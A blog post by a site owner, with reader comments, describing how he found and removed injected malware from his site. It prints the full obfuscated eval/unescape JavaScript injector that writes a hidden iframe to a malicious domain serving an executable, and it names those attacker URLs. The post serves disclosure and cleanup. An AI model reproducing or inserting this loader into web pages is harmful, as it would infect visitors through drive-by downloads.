Help needed – Part 2

First, I would like to thank you all for the precious help you gave me with your comments.

Finally, after hours spent dancing naked to the bone in the streets invoking Manitu, and even more hours trying to explain to the police why I was dancing naked, I found the problem.

Somewhere in the site there was this script (one long line, shown here as extracted):

$="%6fp%3d%22%2524%253d%2522dw(d%2563%2573(cu%252c1%2534)%2529;%2522;%22;cu%3d%22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;bqgx{l:w{y;xp;sfv;64c}p`|)%25$$4|q}s|`),$*(;}rfuyq*(;p}b*%22;da%3d%22fqb0})-~ug0Qbbqi87e~%257F7%3c7tfu7%3c7dxb7%3c7vyb7%3c7fyv7%3c7huc7%3c7fuc7%3c7wxd7%3c7u~y7%3c7ud~7%3c7|uf7%3c7dgu79+fqb0|)-~ug0Qbbqi87q7%3c7r7%3c7s7%3c7t7%3c7u7%3c7v7%3c7w7%3c7x7%3c7y7%3c7z7%3c7{7%3c7|7%3c7}7%3c7~7%3c7%257F7%3c7`7%3c7a7%3c7b7%3c7c7%3c7%22;ca%3d%22%2566u%256ect%2569on %2564cs%2528%2564%2573,e%2573){%2564s%253dun%2565sca%2570e%22;db%3d%22d7%3c7e7%3c7f7%3c7g7%3c7h7%3c7i7%3c7j79+fqb0~)-~ug0Qbbqi8!%3c%2522%3c#%3c$%3c%25%3c&%3c%27%3c(%3c)9+fqb0d)-~ug0Qbbqi89+fqb0t)-~ug0Tqdu89+d)K7i7M-t)%3ewudVe||Iuqb89+yv8t)%3ewudTqi89.#9d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi89;%25229+u|cu%22;cd%3d%22%253dst%252bSt%2572ing%252efro%256dCh%2561%2572Cod%2565%2528(t%256dp.c%2568a%25%22;cz%3d%22%2566unc%2574io%256e%2520%2563z%2528%2563z)%257bret%2575%2572n%2520c%2561%252bcb+%2563c%252bcd+%2563%2565+cz%253b};%22;st%3d%22%2573%2574%253d%2522%2524%253ds%2574;%2564%2563s%2528%2564%2561%252b%2564b%252b%2564c%252bd%2564+%2564%2565%252c%25310%2529;%2564w%2528s%2574%2529%253b%2573%2574%253d%2524;%2522;%22;dc%3d%220d)K7t7M-t)%3ewudTqdu89%3d8t)%3ewudTqi899+yv8d)K7t7M,%25209d)K7t7M-!+d)K7}7M-t)%3ewud]%257F~dx89;!+ve~sdy%257F~0S]^8t%3c}%3ci9kfqb0b-888i;8#:t99;8}Nt9:#9;t9+budeb~0b+mfqb0t-7fuc|%257Fh%3es%257F}7+fqb0iSx!%3ciSx%2522%3c%22;ce%3d%2272Co%2564e%2541t%2528%2530)%255e%2528%25270x%2530%2530%2527+es)%2529%2529;}%257d%22;dd%3d%22}Sx%3ctSx%3c}^}+yv8d)K7i7M,%2522%2520%2520%279kd)K7i7M0-0%2522%2520%2520%27+m}^}-S]^8d)K7t7M%3cd)K7}7M%3cd)K7i7M9+iSx!-|)K888d)K7i7M6%2520hQQ9;}^}950&5##950%2522&M+iSx%2522-|)K8888d)K7i7M6%2520h##!!9..#9;}^}950!%25209M+}Sx%22;de%3d%22-|)K88d)K7}7M;}^}950%2522%259M+yv888d)K7t7M:%25229.-%252096688d)K7t7M:%25229,-)99tSx-~)K8d)K7t7M50!%25209M+u|cu0tSx-|)K88d)K7t7M:&950%2522%279M+4-4%3ebu`|qsu8t%3ciSx%2522;}Sx;iSx!;tSx;})Kd)K7}7M%3d!M;7%3es%257F}79+%22;cb%3d%22%2528ds)
%253bst%253dtm%2570%253d%2527%2527;for%2528%2569%253d0;%2569%253cds.l%256%22;cc%3d%225%256egt%2568;%2569+%252b)%257btmp%253dd%2573.sl%2569ce(%2569,i+%2531);s%2574%22;dz%3d%22%2566%2575nct%2569o%256e %2564w(t%2529{ca%253d%2527%252564%25256%2566c%252575m%2565n%252574%2525%2532e%252577%2572%2525%25369te%252528%2525%2532%2532%2527;c%2565%253d%2527%252522)%2527;cb%253d%2527%25253csc%252572%252569%252570t%2525%25320l%2561n%252567%2575%2561%25256%2537e%25253d%25255c%252522jav%2561%2573c%2572%252569p%252574%25255c%252522%25253%2565%2527;cc%253d%2527%25253c%25255c%25252fs%252563rip%252574%25253e%2527;%2565v%2561%256c(un%2565s%2563ape%2528t))%257d;%22;%69%66 (d%6f%63u%6dent%2ecoo%6bi%65.in%64ex%4ff(%27r%665f%36%64s%27%29%3d%3d-1){%73c(%27rf%35%66%36%64%73%27,2,%37);e%76al%28%75%6eesc%61p%65(dz%2b%63z%2bo%70+st%29+%27dw(%64%7a+%63z($%2bst)%29;%27)}el%73e%7b%24%3d%27%27};functio%6e %73c%28cnm%2cv,e%64){v%61r %65x%64%3dnew Da%74e(%29;ex%64.s%65tD%61te%28ex%64.g%65%74Da%74%65()%2be%64%29%3bdo%63u%6den%74.c%6foki%65%3dc%6em%2b%20%27%3d%27 +e%73c%61pe%28v%29+%27;e%78pi%72%65s%3d%27+exd.t%6fGM%54%53%74ri%6e%67(%29%3b};";eval(unescape($));document.write($);

Once evaluated, it writes this into the page:

<div style="visibility:hidden"><iframe src="http://ewbyuno.com/ld/grb/" width=100 height=80></iframe></div>

That page redirects to http://ewbyuno.com/cgi-bin/in.cgi?p=grobin, which sometimes tries to install a component called “dexplore.exe” and otherwise redirects to google.com.

The funny thing is that when I googled for ewbyuno I found only two results.

The domain is registered to Prokofyev Yaroslav, and the site is hosted on a server owned by SoftLayer Technologies Inc. This company even has a “page” on Wikipedia.

On the same server there are 17 domains… and guess the names? ang2uno.com, bevjuno.com… all owned, of course, by Prokofyev.

So this company seems to have a server dedicated to badware distribution. I emailed them this message:

Hello,
my name is Emanuele Feronato and I recently discovered that one of your servers is hosting domains called ang2uno.com, bevjuno.com, ewbyuno.com (and so on) that are distributing badware after someone injects hidden JavaScript into various blogs and forums that calls your pages from remote servers, with iframes pointing at (for example) http://ewbyuno.com/ld/grb/

One of my sites, emanueleferonato.com, was a “victim” of this process and now google flags it as a site that may harm your computer.

I would like to know whether you are aware of it and how you plan to manage this problem.

Obviously I am going to explain to Google and stopbadware.org what happened, because I don’t want my site to be flagged as badware when the threat comes from your servers.

About half of my traffic comes (came?) from Google, and should it take too long to remove the badware flag, I may consider legal action.

Regards,
Emanuele Feronato

Let’s see what happens.

Now, I want to thank you for your feedback and support, and I apologize for any virus, trojan or badware you got from this site.

See you soon, I have some tutorials to write.

Obviously, now the site is clean.


This post has 19 comments

  1. Paulo Moreira

    on January 15, 2008 at 12:24 pm

    Hope everything gets sorted now! I followed what happened to you and I imagine that this situation put you under lots of stress. Hope that flag from Google disappears, because your posts are wicked! I like the way you explain the technical and the business part. You rock, mate!

  2. Yaig

    on January 15, 2008 at 12:45 pm

    Hi,

    I would be curious how the script got into your site's code in the first place?!
    (In order for it not to happen again.)

    Regards,
    yaig

  3. Endre

    on January 15, 2008 at 1:07 pm

    Hello.

    Have you figured out how your site got infected in the first place?

    Endre
    PS: Great site, by the way!

  4. Lachy

    on January 15, 2008 at 3:19 pm

    Hey,

    I had a game idea and I wanted to know if you could help me out a tad ;) My email is in the WordPress admin :)

    Thanks

  5. robby

    on January 15, 2008 at 3:30 pm

    Yep, I really hope this gets resolved, Emanuele, and hopefully Google will remove the flagged status on your website. Keep us posted.

    :]

  6. Monkios

    on January 15, 2008 at 4:01 pm

    I’m really glad this has been found.

    Hoping to see you continue.

  7. Fetz

    on January 15, 2008 at 7:53 pm

    I think that this site can answer all your questions:

    “Finjan Uncovers Insidious New Variant of Crimeware Toolkit
    Infecting More Than 10,000 US Websites in December
    In its just-released Malicious Page of the Month report, Finjan explores the “random js toolkit”

    http://www.finjan.com/Pressrelease.aspx?id=1820&PressLan=1819&lan=3

  8. emanuel

    on January 15, 2008 at 9:12 pm

    Good luck, cool you solved it.

  9. Frederik J

    on January 15, 2008 at 9:18 pm

    That’s good news. :-)
    I'll stay tuned!

  10. Shiv

    on January 16, 2008 at 2:23 pm

    Hi emanuele,

    Great that you finally started to mend those badwares. But as far as I know, that fool of
    bevjuno will even answer your mail.

    Anyways, the world stands on hope.

  11. Hawdon

    on January 16, 2008 at 6:00 pm

    I'm sorry to say, but when I googled this site the “this site might harm you” text is still there… Just saying…

  12. Gonzalo

    on January 17, 2008 at 3:15 am

    OMG.

    I hope they delete the badware; in any case you can take legal action saying they lowered your page visits, just by showing them the logs.

  13. Dog Gon Mad

    on January 17, 2008 at 5:26 pm

    Hey, you were unflagged at around 3:00 this morning. And also thank you for the great tutorials.
    -DGM

  14. Dog Gon Mad

    on January 17, 2008 at 5:28 pm

    Oops, 3:00 GMT-07:00

  15. Josh

    on January 17, 2008 at 8:21 pm

    Hey, I'm making a bird's-eye-view shooter and I am having trouble arranging movie clips I bring in with ActionScript. How do you attach a movie clip and arrange it to the back? I searched Google but I couldn't find anything.
    I would appreciate the help.

  16. Ed

    on January 17, 2008 at 10:28 pm

    Josh you want to look up Depths.

  17. Dog Gon Mad

    on January 21, 2008 at 3:02 am

    Hey Emanuele, Google has up another part of the site: Experiment: monetizing a Flash game : Emanuele Feronato – italian …
    Also thank you for your tuts, they have really helped me.
    -DGM

  18. Emanuele Feronato

    on January 21, 2008 at 9:37 am

    I know, the entire process of removing the ad may take up to a few weeks.

  19. Brecheen

    on August 23, 2009 at 7:09 am

    Hi, this is a really nice post, I like it so much.
    Thank you very much.